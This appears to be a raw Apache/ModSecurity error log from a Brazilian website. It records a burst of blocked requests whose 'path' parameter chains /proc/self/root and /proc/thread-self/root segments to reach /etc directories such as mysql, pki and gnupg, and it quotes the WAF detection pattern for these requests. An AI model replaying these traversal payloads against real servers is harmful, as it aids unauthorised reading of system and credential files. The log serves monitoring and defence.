https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:14.558095 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:53228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3ehj0p0SRWAqcjGGl-AAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:17.998557 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:47966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3fQkwaGbbGflqUZCwCwAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:18.199436 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:47966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3fgkwaGbbGflqUZCwDAAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:19.171623 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:44758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3f9a6ubjKNq_cu4YytwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:19.726802 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:47980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3f8df6f5d65gmYZRrEgAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:20.004015 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:47980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3gMdf6f5d65gmYZRrEwAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:22.031414 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:47988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3gsdf6f5d65gmYZRrFQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:23.611725 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:48002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3gwkwaGbbGflqUZCwDwAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:24.557894 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:44758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3hNa6ubjKNq_cu4YyuwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:25.242342 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:48016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3hQkwaGbbGflqUZCwEwAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:25.449997 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:48016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3hQkwaGbbGflqUZCwFQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:26.126704 2026] [proxy_fcgi:error] [pid 18211:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42812] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:53:27.374628 2026] [:error] [pid 18211:tid 140411725141760] [client 74.7.241.31:56864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3hxcIZFNFgEhGGCRDdQAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:27.587506 2026] [:error] [pid 18211:tid 140411599251200] [client 74.7.241.31:56864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3hxcIZFNFgEhGGCRDdgAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:30.616153 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:56870] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3ita6ubjKNq_cu4YywgAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:32.309393 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:56886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3jNa6ubjKNq_cu4YyxAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:32.475169 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:56886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3jNa6ubjKNq_cu4YyxgAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:35.595343 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:56896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3jgkwaGbbGflqUZCwGgAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:37.063544 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:56902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3kda6ubjKNq_cu4YyywAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:48.126682 2026] [proxy_fcgi:error] [pid 11816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:53:49.540881 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:57988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3new_le52K8_3pV141QAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:53.052071 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:57994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3ocdf6f5d65gmYZRrIgAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:53.252648 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:57994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3ocdf6f5d65gmYZRrIwAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:54.623344 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:58006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3ota6ubjKNq_cu4Yy0wAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
